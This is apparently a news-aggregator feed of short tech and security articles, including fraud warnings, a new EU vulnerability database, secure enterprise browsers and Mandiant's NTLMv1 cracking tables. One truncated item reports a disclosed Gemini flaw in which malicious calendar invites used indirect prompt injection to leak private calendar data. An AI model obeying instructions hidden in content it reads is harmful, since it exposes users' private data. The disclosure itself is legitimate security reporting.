Die Polizei und die Bundesanstalt für Finanzdienstleistungsaufsicht (Bafin) warnen regelmäßig vor solchen Betrugsmaschen. Immer wieder würden Werbeanzeigen oder E-Mails verbreitet, in denen mit Fotos oder Videos von Prominenten ohne deren Wissen für angeblich sichere Geldanlagen mit außerordentlich hohen Gewinnen geworben werde. Häufig gehe es um Kryptowerte oder anderen Finanzprodukten. Die Angebote seien oft professionell gestaltet und für Laien schwer als Betrug zu erkennen.
Die Bafin warnt davor, Links in solchen Anzeigen anzuklicken. Diese führten häufig zu betrügerischen Online-Handelsplattformen. Nach einer Registrierung gäben sich die Täter als Experten aus und überredeten zunächst zu kleinen, später zu immer höheren Investitionen. Angezeigte Gewinne seien lediglich vorgetäuscht. Tatsächlich finde in der Regel keine Investition statt und das eingezahlte Geld fließe an die Betrügerinnen und Betrüger. Weitere Tipps hat die Polizei auf einer Internetseite zusammengefasst. (dpa/jm)

View the full article

• 0 comments
• 255 views

CSOonline

January 20Jan 20

EU vulnerability database goes live

EU vulnerability database goes live

A free, publicly accessible database for IT security vulnerabilities, the db.gcve.eu, has been created by GCVE (Global Cybersecurity Vulnerability Enumeration). The aim is to end dependence on US databases and strengthen digital sovereignty in Europe.
The initiative came together after a brief scare over the possible discontinuation of the Common Vulnerabilities and Exposures (CVE) program in 2025. The risk got many concerned forcing the cybersecurity industry to start thinking of alternatives.
GCVE database aims to facilitate vulnerability reporting
The platform brings together information from various public resources. These include the sources of the GCVE Numbering Authority (GNA) model. It replaces the traditional, centralized assignment of vulnerability identifiers (CVE IDs). Data from other recognized vulnerability directories is also used.
The decentralized approach makes it possible to assign and publish vulnerability identifiers autonomously without having to wait for central approval. A total of more than 25 different data sources are currently integrated. The vulnerability data collected is normalized, structured, and made searchable.
In addition, the open API offers seamless integration into existing compliance tools and risk management systems. This should enable security officers, scientists, computer security incident response teams, software providers, and open-source developers to track and evaluate security reports more efficiently across ecosystems.

View the full article

• 0 comments
• 54 views

CSOonline

January 20Jan 20

Tudou Guarantee Marketplace Halts Telegram Transactions After Processing Over $12 Billion

Tudou Guarantee Marketplace Halts Telegram Transactions After Processing Over $12 Billion

A Telegram-based guarantee marketplace known for advertising a broad range of illicit services appears to be winding down its operations, according to new findings from Elliptic. The blockchain intelligence company said Tudou Guarantee has effectively ceased transactions through its public Telegram groups following a period of significant growth. The marketplace is estimated to have processedView the full article

• 0 comments
• 44 views

Hacker News

January 20Jan 20

Secure web browsers for the enterprise compared: How to pick the right one

Secure web browsers for the enterprise compared: How to pick the right one

Web browsers have long been the security sinkhole of enterprise infrastructure. While email is often cited as the most common entry point, malware often enters via the browser and is more difficult to prevent. Phishing, drive-by attacks, ransomware, SQL injections, man-in-the-middle (MitM), and other exploits all take advantage of the browser’s creaky user interface and huge attack surface, and the gullibility of most end users.
It is this last item — humans — that is the problem, and we need to be protected against ourselves. This is especially true as SaaS applications grow in usage, not to mention that every piece of hardware seems to come with a web server (and therefore a browser) to configure it. These use cases are aided and abetted by the increasing number of work-from-home staffers who depend on more browser-based apps.
This is why enterprise secure browsers have finally gotten their moment. The category, which has been mostly flying under the radar for the past six years, has seen a lot of changes. Google announced its own entry into the field in 2025. Appaegis, Talon and Perception Point were acquired by Mammoth Cyber, Palo Alto Networks and Fortinet respectively, showing how this technology has become part of a larger security context. To that end, other established security vendors have brought forth products in what Gartner is now calling the “remote browser isolation” market to complement their zero trust, secure services edge, or posture management security platforms.
Web browsers have security settings to protect your privacy and to enable you to browse sites more anonymously. This isn’t really a satisfactory solution because these settings will typically result in more user frustration. Turning up security settings will prevent your users from conducting business on many websites, either blocking pop-ups that are needed to navigate some business site, stopping forms from collecting important information, or making your browsing session miserable in some other fashion.
Brave, DuckDuckGo, RAV Online Security from ReasonLabs, Opera and others have more secure consumer-focused browsers, but these aren’t appropriate for enterprises. They are what I would call “safer” or “more private” browsers. Some vendors have taken the recommendations of the Global Privacy Control to heart and have developed their own browser extensions that help guard your individual privacy. All these browsers are better but still not good enough for business uses.
Instead, a different type of tool is needed to manage an entire browser collection. Gartner in an April 2025 report, says, “Threat actors frequently target employees with phishing attacks to steal credentials and bypass endpoint detection and response controls, necessitating an additional layer of visibility and control within the web browser.” Gartner recommends secure browsers can complement “gaps in existing controls on managed devices rather than replace existing security controls, unless you are a cloud-only, remote-work-oriented company with few physical locations to secure.”
While some enterprise security products touch on browser security such as secure web gateways, running a browser in a virtual desktop or using a managed endpoint service, they don’t focus on the total browsing experience and can’t stop many of the potential threat vectors. This is why the secure browser has become more popular and is available in a variety of configurations that can help IT managers get a better handle on stopping attackers from getting a foothold inside your networks.
Tips to evaluate secure web browsers
Before you start an evaluation, you need to understand how these browsers work and how they will be managed. Browsers require a robust and granular collection of security controls to be able to work with the widest possible collection of websites and cloud services. This needs to happen from a central management platform that can apply a collection of firewall-like rules and policies across the entire user population. This includes several broad categories:
Enable MFA at the beginning of any browser session by default. Handle isolation controls both with respect to the user’s session and to isolate any application from cross-infection. This means controlling the movement of data between the browser, your particular endpoint and the web application or applications involved. Control access to web destinations, either to allow or block this access. Detect malware to block phishing, man-in-the-browser and other attacks, such as those aimed at defeating browser extensions. Apply data loss prevention controls, which include browser settings such as ad blocking, URL and domain filtering, blocking printing, cut-and-paste operations, and screen sharing. These controls should also be able to manage your browser extensions in such a way that a user can’t override or circumvent them. Enable a variety of logging tools to aid in remediation or reconstruction in case of attacks or data destruction. Enable anonymous surfing for times when this is needed, such as protecting travellers when they are in more totalitarian locations. Enable a protected and secure file storage space that can be shared among a team of collaborators. Replace VPNs and virtual desktops as ways to deliver more secure remote and cloud services. Any browser needs to integrate with existing security products such as identity management, cloud applications security posture, single sign-on (SSO) and VPNs. That is a lot of software to work with, and some vendors have begun offering specialized browsers as part of their security platforms. Forexample, iBoss’ and Cloudflare’s Remote Browser Isolation tools are only available as an add-on option to its larger security platforms.
GigaOm uses this rubric where the browser must come up to four different (and non-exclusive) operating modes, in various combinations:
A full desktop browser client, what we have called in the past a thick client, to replace a consumer browser and typically connects to a secure remote session. Browser extension to existing consumer browsers, relevant to both the browser software and underlying operating system. Agentless browser controls to enforce security policies. Cloud-based management and proxy, which is typically used with the above three modes or with a thin client that connects to the cloud service. For example, Google’s Chrome Enterprise browser mostly relies on the fourth mode. Other products, such as Authentic8’s Silo, Palo Alto Networks’ Prisma and Island’s browsers offer products that cover multiple modes. There is a fifth mode that Seraphic uses, building an agent that sits on top of the JavaScript engine and supplements existing browsers.
Why are these different deployment modes necessary? It is because the browser is so versatile and can operate in a variety of circumstances, ranging from controlling some SaaS-based application to viewing dynamic content from a database to managing a collection of remote servers. Having the different modes is a way to extend its utility and still provide a secure envelope in as many possible situations.
While all these products run specially crafted Chromium versions, they typically employ Linux virtual machines to provide remote isolation features. That could be an issue if you are trying to run web content that isn’t Linux friendly, such as some streaming services. The good news is that the secure browsers are close to parity with a standard desktop browser and running close to the most current Chrome versions.
The biggest issue to implement these browsers will be staffing and support. This starts with integration into your other security products and onboarding and training your users how to browse the web under the newer and hopefully more secure regime. This will be a significant load on your own internal support resources to handle the various helpline calls from confused or frustrated users when they encounter unexpected results from their browsing experience.
Finally, there is the price. For decades browsers have been free or bundled with the endpoint operating system. Secure browsers will cost something, and even a few dollars a month per user can add up over time and across an entire enterprise population. Gartner said in its report: “Free browsers are ubiquitous, to the point that organizations must have specific use cases to justify the purchase of a separate browser.” It remains to be seen if security is that compelling use case. Expect to pay somewhere around $10/month/user for subscription options, with quantity discounts available.
Secure web browsers compared
Authentic8 has been in the secure browser business for more than a decade and continues to enhance its product and widen its services offerings. Silo can provide two-way full isolation and integrate it into your existing workflows and provide a wide collection of security policies that offer fine-grained control over protecting your apps and your data. It has a main dashboard that looks a lot like an SSO tool to launch your protected web applications.
Silo offers two different client downloads: Windows and Mac thick clients and a thin client. Both can be managed centrally and via an API connection, all of which kick off Linux-based sessions. While the vendor did not reveal pricing specifics, two plans are available: on a per user or per hourly consumption basis. It also provides custom browsers based on a customer’s API collection.
Ermes Browser Security offers a variety of security features including phishing protection, cybersquatting, extension monitoring, and URL filtering. It uses a browser extension and has separate mobile apps.
Fortinet acquired Perception Point’s secure browser extension and integrated it into this product Fortinet Remote Browser Isolation. It integrates with other protective features such as securing cloud apps and offers any browser real-time protection with other dynamic security features through a browser extension. The product is sold with various quantity discounts, with typical pricing at $55/user/year.
Google’s own enterprise product uses the Chrome Enterprise Core as its foundation, which is also the free version. The Premium version adds most of its protective features. Both versions have a very complex setup to enable their managed browser service, part of its complexity is that it has numerous fine-grained security controls, such as numerous steps to add encryption, as well as using specialized OS-specific installation such as mobile management software with more than a dozen steps. The other products make this a bit easier, but there is still a lot of trial and error with Google’s software to ensure that the security isn’t blocking legitimate browsing uses, sites, or corporate applications. It is available for all Google Workspace customers and will cost an additional $72/user/year, with a free 30-day trial period that includes 50 user licenses.
Island’s enterprise browser comes both as a browser extension and a thick replacement client for Linux, Windows, Mac, Android, iOS and Chromebooks. It has extensions for Chrome, Edge, Safari and Firefox. It has robust network management and protective functions to complement its browser security.
LayerX Security enterprise browser has both an extension and a thick browser client which integrates with a number of identity protection platforms and offers extension monitoring, DLP, traffic filtering and other features.
Mammoth acquired Appaegis’ secure browser and offers a thick managed client that includes browser session recording, copy-paste blocking, watermarking, screen-share prevention, and data masking. It supports Windows, Mac, iOS and Android devices. The Android version is the most recent and doesn’t have complete feature parity with the other OS versions.
ManageEngine Browser Security Plus is a thick Windows and Mac browser called Ulaa. It comes in a free edition for up to 25 computers and professional edition with additional security features, including DLP, threat prevention, web filtering and phishing protection.
Menlo Security Secure Enterprise Browser is a cloud-based software part of a collection of other products that offer file security, ZTNA and other protective features.
Palo Alto Networks Prisma Access Browser is a result of the acquisition of Talon’s browser technology and offer thick clients for Windows, Mac, Linux, Android and iOS and browser extensions. It uses a cloud-based management service from Strata. It has a full managed feature set that includes data loss prevention features, extensive logging, and plenty of policies and rule sets. Like some of the others, you can set up a main login like an SSO tool to launch your apps. It will examine the endpoint posture to ensure that it is running the latest OS version and identify risky browser extensions or restricted URLs that you can specify. It comes with a detailed implementation guide and existing Prisma platform customers are eligible for free browser licenses.
Seraphic Enterprise Browser Security has a unique mode of operations with an agent that works on top of the browser’s JavaScript engine. It supports both managed and unmanaged browsers including generative AI-based Atlas and works with a series of protective modules including ZTNA, DLP, traffic filtering, remote connection management, identity security and other security features. There are also thick clients for both Android and iOS devices. It has competitive per-user pricing (each user can install on up to four devices) with quantity discounts.
Surf Security Zero Trust Enterprise Browser offers both a thick browser replacement client and browser extension with a variety of protective features, including DLP and ZTNA support, and integration into Okta’s SSO platform.
SquareX Enterprise offers a browser extension that includes DLP, generative AI protection and threat hunting features, and can isolate and remove malicious code. It supports the three major desktop OSs and major browser vendors, including AI-based browsers from Perplexity and Atlas. It integrates with various identity, SIEM and SSO providers and supports Okta’s Shared Signal Framework.
View the full article

• 0 comments
• 77 views

CSOonline

January 20Jan 20

This Intune update isn’t optional — it’s a kill switch for outdated apps

This Intune update isn’t optional — it’s a kill switch for outdated apps

Enterprises using Intune mobile application management (MAM) beware: Your apps won’t run soon if you haven’t planned ahead.
Microsoft is updating its Intune MAM to support new security requirements starting January 19 or “soon after”, requiring that all iOS-wrapped apps, iOS SDK-integrated apps, and the Intune Company Portal for Android be updated to the latest Intune versions to keep them secure and running.
This means that enterprises that haven’t updated to the latest versions will be blocked from launching their apps altogether. And, this may not just include custom apps wrapped in Intune MAM, but other frequently-used ones such as Outlook and Teams.
Simply put, “If you want your stuff to work, get it updated and pushed,” said David Shipley of Beauceron Security.
What’s being updated in iOS, Android
Microsoft Intune is a core component of the Microsoft Modern Workplace. Its MAM features help enterprises secure their data on both corporate and personal devices. Using it, IT teams can manage corporate apps like Outlook or Teams without having to manage the entire device. This type of unified endpoint management (UEM) supports feature deployments, updates, and retirement of apps, while also protecting corporate data and preventing data leaks, with (ideally) minimal disruption for the user.
With Monday’s hard deadline, Microsoft will enforce stricter security requirements within the UEM — but only for approved users. Those without the latest app protection supported Microsoft or third-party apps will “be blocked from launching their apps,” the company warned. Microsoft announced the required updates several months ago in the Microsoft 365 Admin Center.
For Apple users, Monday’s full stop means:
iOS line-of-business (LOB) and custom iOS apps using the Intune App SDK must update to SDK version 20.8.0 or later for apps compiled with Xcode 16, and to 21.1.0 or later for apps compiled with Xcode 26. Apps using the wrapper must update to the new version of the Intune App Wrapping Tool for iOS: version 20.8.1 or later for apps built with XCode 16; and version 21.1.0 or later for apps built with XCode 26. It’s a little simpler for Android users: Once one Microsoft app with an updated SDK is on the device and the company portal is updated to version 5.0.6726.0 or later, other Android apps will update.
Tenants with policies targeted to both iOS and Android apps should notify their users that they need to update, and ensure Microsoft apps such as Teams and Outlook are up-to-date, Microsoft advised. Admins can also enable conditional launch settings to block apps using older versions of the SDK or to warn users if they are using older versions of apps.
Admins can also proactively ensure that users are not blocked while doing work on their phones. In the Microsoft Intune admin center, they can navigate to Apps > Monitor > App protection status to review the app and SDK versions users are running.
“We recommend to always update your Android and iOS apps to the latest SDK or app wrapper to ensure that your app continues to run smoothly,” Microsoft emphasized.
Overall, the company advised enterprises to use conditional access policies so that only apps with app protection policies enabled can access corporate resources.
Supporting new security tools (and why enterprises should have updated yesterday)
With its new security updates, Microsoft has wrapped controls around existing custom apps that businesses have built, Beauceron’s Shipley explained. These enable features such as requiring a PIN or biometric authentication inside the app, restricting data sharing with other managed apps, and selectively wiping corporate data from apps.
“This [update] may be because there’s some risk with the older versions not doing what they should’ve been doing for protections,” Shipley noted.
He pointed out that Microsoft has been signaling this update since 2025 and already pushed back implementation from mid-December 2025 to this week. Also, it’s interesting to note that this change may not just impact custom apps wrapped in Intune MAM, but Outlook, Teams, and others applications as well.
“The long and short of it is, what Redmond wants is what Redmond gets when it finally puts a foot down, like it appears to have in this case,” said Shipley.
This deadline shouldn’t come as a surprise to IT teams who stayed on top of things, noted Fritz Jean-Louis, principal cybersecurity advisor at Info-Tech Research Group. Microsoft has been deprecating various parts of Intune, and how it connects from an infrastructure perspective, for some time now.
“Like many other things, if you’re not actively managing [with] the right amount of due diligence, you will be impacted by this,” said Jean-Louis, noting that employees dealing with work tasks on their phones (either remotely or on-premises) will experience outages without the updates. “It’s going to seriously impact users if this has not been adequately addressed.”
From an IT perspective, if they’re not ready for the new versioning, admins should contact Microsoft as soon as possible and determine whether mitigations can be put in place until their team is ready.
If users experience issues, they should contact their official IT service desk, Jean-Louis advised. They should not attempt to self-resolve by, say, going to a random site and blindly entering a user ID and password to receive updates. Threat actors may be lying in wait, using this type of opportunity to deploy malware “fixes.”
“Threat actors are always looking for this sort of major change to take advantage,” he noted.
This article originally appeared on Computerworld.
View the full article

• 0 comments
• 50 views

CSOonline

January 20Jan 20

Mandiant pushes organizations to dump insecure NTLMv1 by releasing a way to crack it

Mandiant pushes organizations to dump insecure NTLMv1 by releasing a way to crack it

Google’s Mandiant security division has come up with an unusual tactic to persuade organizations to stop using the aged and hugely insecure NTLMv1 authentication protocol: publish a data lookup that makes cracking NTLMv1 credentials trivial for attackers.
The intention, Mandiant explained, is to draw attention to the fact that, despite decades of evidence that NTLMv1 (NT LAN Manager version 1) is insecure, organizations continue to use it. Anyone can use Mandiant’s Net-NTLMv1 pre-computed rainbow table lookup, downloadable from the Google Cloud Research Dataset portal, to map a given server response to reconstruct a real NT hash.
Hashes, of course, are mathematical representations of real passwords, but are just as useful to criminals when exploited using techniques such as pass-the-hash. The benefit is time and money saved: Mandiant reckons its rainbow table allows the recovery of an NTLMv1 key in 12 hours using a computer costing $600, rather than relying on third party services or expensive hardware to brute-force the keys.
None of this makes NTLMv1 less secure or easier to target than it already is. Mandiant’s hope is that the release of the table will serve as a reminder that the problem exists, prompting organizations to finally rip out NTLMv1 from their networks.
“This legacy protocol leaves organizations vulnerable to trivial credential theft, yet it remains prevalent due to inertia and a lack of demonstrated immediate risk,” the company said in its announcement. “By releasing these tables, Mandiant aims to lower the barrier for security professionals to demonstrate the insecurity of Net-NTLMv1.”
Long fallback
NTLMv1 is a 1990s challenge-response protocol used to authenticate Windows NT users to Active Directory (AD). Based on 1980’s Data Encryption Standard (DES) encryption, it was updated to the more secure NTLMv2 in 1996 before being completely replaced by Kerberos. Unfortunately, legacy protocols like NTLMv1 don’t just disappear, and are retained as a fallback in case they are needed by older applications. That fallback has turned out to last decades.
What evidence does Mandiant have that organizations are still using NTLMv1? The first is anecdotal: “Mandiant consultants continue to identify its use in active environments,” the company noted in last week’s announcement.
Secondly, cyberattackers regularly target it. For example, a 2024 campaign by the TA577 threat group targeted NTLM hashes by using booby-trapped emails to send challenge-response authentication requests to internal SMB resources such as legacy printers.  
A more recent incident involved an authentication relay attack aimed at a specific NTLM vulnerability, CVE-2025-54918, which came only weeks after Microsoft announced that it was finally removing NTLMv1 support from Windows Server 2025 and Windows 11.
Primary hurdle: Knowing it’s still there
According to Rob Finn, International vice president at supply chain security company Chainguard, even security-aware organizations could be caught out by NTLMv1.
“Legacy protocols like NTLMv1 are buried deep within third-party firmware. A security team might deprecate NTLMv1 at the OS level, only to have a legacy printer driver or industrial sensor reintroduce it via an unpatched, decades-old library,” he said. “For most companies, the primary hurdle isn’t just knowing NTLMv1 is insecure, it’s knowing that it’s still there.”
Because resources such as printers are not externally exposed, it is tempting to assume they are beyond the reach of attackers. Despite this, NTLMv1 can still be targeted from outside the network using relay or coercion techniques, by, for example, triggering authentication via a phishing attack.
“Attackers don’t need to know you’re using it. They just have to poke the system to find out. Fundamentally, organizations keep legacy protocols active not because they want to, but because they fear breaking a mission-critical legacy app,” said Finn.
Despite Microsoft recommending that organizations upgrade to NTLMv2 and Kerberos for more than two decades, it appears not everyone got the memo. “In crypto terms, NTLMv1 isn’t just old, it’s archaeological,” said Rob Anderson, head of reactive consulting services at Reliance Cyber. “NTLMv1 is still enabled, not because it is needed today, but because it was needed once, and nobody is quite brave enough to turn it off and see what breaks.”
Despite those fears, organizations need to take action. “Scan for its use, find out why it is in use, register it as a high risk and get to work removing it, with achievable deadlines,” he advised.
View the full article

• 0 comments
• 51 views

CSOonline

January 19Jan 19

How Much RAM Will the iPhone 18 Pro Have? Here's What Rumors Say

How Much RAM Will the iPhone 18 Pro Have? Here's What Rumors Say

While the iPhone 18 Pro and Pro Max are still around eight months away, multiple sources have already commented on how much RAM the devices will have.


In a blog post last year, Apple supply chain analyst Ming-Chi Kuo said that he expected all of the new iPhone models released later this year to be equipped with 12GB of RAM. That would include the iPhone 18 Pro, iPhone 18 Pro Max, and iPhone Fold, and it would match the 12GB of RAM included in the iPhone 17 Pro models.

In a research note last week, obtained by MacRumors, analyst Jeff Pu agreed that the iPhone 18 Pro models and iPhone Fold will have 12GB of LPDDR5 RAM.

It has been rumored that even the standard iPhone 18 will have 12GB of RAM, which would be an increase over the 8GB of RAM in the standard iPhone 17.

Here is how much RAM is in the latest iPhones:iPhone 17: 8GB
iPhone 17 Pro: 12GB
iPhone 17 Pro Max: 12GB
iPhone Air: 12GBHere is how much RAM is expected in the next iPhones:iPhone 18: 12GB
iPhone 18 Pro: 12GB
iPhone 18 Pro Max: 12GB
iPhone Fold: 12GBApple is expected to release the iPhone 18 Pro and iPhone 18 Pro Max in September, but the standard iPhone 18 is not expected to be announced until around March 2027, as Apple is reportedly shifting to a new two-phase launch strategy.

For the iPhone 18 Pro's A20 Pro chip, RAM will reportedly be integrated directly onto the chip's wafer with the CPU, GPU, and Neural Engine, rather than being adjacent to the chip and connected with a silicon interposer. This could boost the RAM's performance and efficiency, especially for Apple Intelligence tasks.Related Roundup: iPhone 18Tag: Jeff PuRelated Forum: iPhone
This article, "How Much RAM Will the iPhone 18 Pro Have? Here's What Rumors Say" first appeared on MacRumors.com

Discuss this article in our forums

View the full article

• 0 comments
• 38 views

reporter

January 19Jan 19

Google Gemini Prompt Injection Flaw Exposed Private Calendar Data via Malicious Invites

Google Gemini Prompt Injection Flaw Exposed Private Calendar Data via Malicious Invites

Cybersecurity researchers have disclosed details of a security flaw that leverages indirect prompt injection targeting Google Gemini as a way to bypass authorization guardrails and use Google Calendar as a data extraction mechanism. The vulnerability, Miggo Security's Head of Research, Liad Eliyahu, said, made it possible to circumvent Google Calendar's privacy controls by hiding a dormantView the full article

• 0 comments
• 37 views

Hacker News

January 19Jan 19

Walmart Still Doesn't Accept Apple Pay in the U.S. in 2026, Here's Why

Walmart Still Doesn't Accept Apple Pay in the U.S. in 2026, Here's Why

As noted by 9to5Mac over the weekend, Walmart still does not accept contactless payment options like Apple Pay at its more than 4,500 stores across the U.S., and there is no indication that will be changing any time soon.


It is not just Apple Pay that is affected. Walmart also does not allow customers to use Google Pay or Samsung Pay, and you cannot tap a credit or debit card either.

It is far from the first time that we have reported on this topic, but Walmart has still not changed course, despite endless customer complaints.

Last year, a Walmart spokesperson told MacRumors that the retailer remained focused on its own payment technologies in the Walmart app, including Walmart Pay and Scan & Go, but these options are not as convenient as one-tap Apple Pay.

To use Walmart Pay, customers must add a payment card to the Walmart app, and then scan a QR code displayed at the checkout to complete payment. This system allows Walmart to track a customer's purchase history and learn their habits, which is likely the biggest underlying reason that the retailer does not accept Apple Pay.

Scan & Go allows Walmart+ members to save time by scanning barcodes on items while they shop, rather than having to scan all of the items at a self-checkout register later. This can save you time, but Apple Pay is still not accepted.

Apple Pay has a lot of privacy protections, including hiding actual credit card numbers, and this would make it harder for Walmart to track customers.

Apple Pay launched more than 10 years ago, and it was accepted at more than 90 percent of U.S. retailers as of 2022, according to Apple. Some other major Apple Pay holdouts in the U.S. have reversed course and started accepting it over the past few years, including The Home Depot, Lowe's, Kroger, and Texas grocery store chain H-E-B, leaving Walmart as one of the country's only major retailers that does not accept Apple Pay.

Interestingly enough, Walmart has accepted Apple Pay in Canada since 2020, but apparently it is not willing to offer that luxury in America for now.Related Roundup: Apple PayTag: WalmartRelated Forum: Apple Music, Apple Pay/Card, iCloud, Fitness+
This article, "Walmart Still Doesn't Accept Apple Pay in the U.S. in 2026, Here's Why" first appeared on MacRumors.com

Discuss this article in our forums

View the full article

• 0 comments
• 262 views

reporter

January 19Jan 19

iPhone 18 Pro: Under-Screen Face ID, LTPO+ Display, Dynamic Island Debate Continues

iPhone 18 Pro: Under-Screen Face ID, LTPO+ Display, Dynamic Island Debate Continues

While most sources in the Apple rumor scene agree that the iPhone 18 Pro and iPhone 18 Pro Max will feature under-screen Face ID, there continues to be conflicting rumors about how that change might impact the Dynamic Island.


In a post on social media platform X today, the account "ShrimpApplePro" claimed that the Dynamic Island will be "shorter" on the iPhone 18 Pro models, as a result of some Face ID components moving under the screen. Only the front camera and Face ID's infrared camera will remain visible on the devices, they said.

"ShrimpApplePro" has accurately leaked some details about devices like the iPhone 15 Pro and Apple Watch Series 9 in the past, but they are not always correct. Early rumors should always be treated with some skepticism.

Last month, The Information said that the front camera would be moved to the top-left corner of the screen on the iPhone 18 Pro models. The report explicitly said this change would help to eliminate the pill-shaped cutout in the screen, but "ShrimpApplePro" evidently believes that the Dynamic Island will live on in a smaller way.

YouTube channel Front Page Tech mocked up an iPhone 18 Pro with both the front camera and a smaller Dynamic Island in the top-left corner of the screen, but the video might simply be combining the two rumors mentioned above.

While the exact implementation remains to be seen, the good news is that it really does sound like under-screen Face ID is finally happening this year.

South Korean publication ETNews today reported (via "Jukan") that the iPhone 18 Pro models will use under-screen infrared technology from Samsung, which would pave the way for under-screen Face ID. The report also said the devices will use so-called LTPO+ display technology, which would likely be more power efficient than the current LTPO technology in the iPhone 17 series. This upgrade should contribute to longer battery life.

Apple is expected to unveil the iPhone 18 Pro models in September, and hopefully the Face ID and Dynamic Island rumors are more clear by then.Related Roundup: iPhone 18Tags: ETNews, Face ID, ShrimpAppleProRelated Forum: iPhone
This article, "iPhone 18 Pro: Under-Screen Face ID, LTPO+ Display, Dynamic Island Debate Continues" first appeared on MacRumors.com

Discuss this article in our forums

View the full article

• 0 comments
• 38 views

reporter

January 19Jan 19

Neue EU-Schwachstellen-Datenbank gestartet

Neue EU-Schwachstellen-Datenbank gestartet

Summit Art Creations – shutterstock.com
Mit db.gcve.eu stellt die GCVE-Initiative (Global Cybersecurity Vulnerability Enumeration) ab sofort eine kostenfreie, öffentlich zugängliche Datenbank für IT-Sicherheitslücken bereit. Ziel ist es, die Abhängigkeit von US-Datenbanken zu beenden und die digitale Souveränität in Europa zu stärken.
GCVE-Datenbank soll Schwachstellenmeldung erleichtern
Die Plattform führt Informationen aus verschiedenen öffentlichen Ressourcen zusammen. Dazu zählen die Quellen des GCVE Numbering Authority (GNA)-Modells. Es löst die traditionelle, zentrale Vergabe von Schwachstellen-Kennungen (CVE IDs) ab. Zudem werden Daten von weiteren anerkannten Schwachstellenverzeichnissen genutzt.
Der dezentrale Ansatz ermöglicht es, Schwachstellen-Kennungen autonom zu vergeben und zu veröffentlichen, ohne auf eine zentrale Freigabe warten zu müssen. Insgesamt werden derzeit mehr als 25 unterschiedliche Datenquellen eingebunden. Die erfassten Schwachstellendaten werden normalisiert, strukturiert und durchsuchbar aufbereitet.
Darüber hinaus bietet die offene API eine nahtlose Integration in bestehende Compliance-Tools und Risikomanagement-Systeme. Sicherheitsverantwortliche, Wissenschaftler, Computer Security Incident Response Teams, Softwareanbieter und Open-Source-Entwickler sollen dadurch in die Lage versetzt werden, Sicherheitsmeldungen ökosystemübergreifend effizienter nachzuverfolgen und auszuwerten.
View the full article

• 0 comments
• 48 views

CSOonline

January 19Jan 19

Apple Honors Dr. Martin Luther King Jr. With Full-Page Website Tribute

Apple Honors Dr. Martin Luther King Jr. With Full-Page Website Tribute

Apple has updated its homepage to honor Dr. Martin Luther King Jr. today. The page highlights some of King's most impactful quotes, and invites people to explore his legacy further through the Apple Books and Apple Podcasts apps.


Apple shows photos of Dr. King visiting a church in Miami, Florida, holding a news conference in Birmingham, Alabama, and speaking to a crowd in Jackson, Mississippi.

Apple has ran a full-page Dr. Martin Luther King Jr. homepage tribute for more than a decade.

"We honor Dr. King and reflect upon his life and legacy," says Apple.

Today is Martin Luther King Jr. Day in the United States. Given it is a federal holiday, the Apple news cycle might be relatively quieter today.Tag: Martin Luther King Jr
This article, "Apple Honors Dr. Martin Luther King Jr. With Full-Page Website Tribute" first appeared on MacRumors.com

Discuss this article in our forums

View the full article

• 0 comments
• 32 views

reporter

January 19Jan 19

Google Chrome Is Getting a Safari Data Import Option on iPhone

Google Chrome Is Getting a Safari Data Import Option on iPhone

Chrome for iOS will soon feature an option for iPhone users to import their Safari data into Google's mobile browser, avoiding the need to perform the transfer on desktop.


Starting in Chrome 145, currently in beta, the new feature will guide users through the process of importing bookmarks, browsing history, and passwords from Safari, since Chrome cannot transfer the data directly because of Apple's privacy rules.

The process involves manually exporting Safari browsing data to a zip file downloaded to the user's iPhone, and then selecting the file in Chrome for import using the new option.

Chrome's interface displays a breakdown of what will be imported, before doing so on the user's confirmation, then the browser offers to delete the zip file as a privacy measure.

The feature is currently appearing in the latest version of Chrome 145 in TestFlight, so it should begin to roll out with the next stable release.

(Via MacObserver.)Tag: Chrome for iOS
This article, "Google Chrome Is Getting a Safari Data Import Option on iPhone" first appeared on MacRumors.com

Discuss this article in our forums

View the full article

• 0 comments
• 42 views

reporter

January 19Jan 19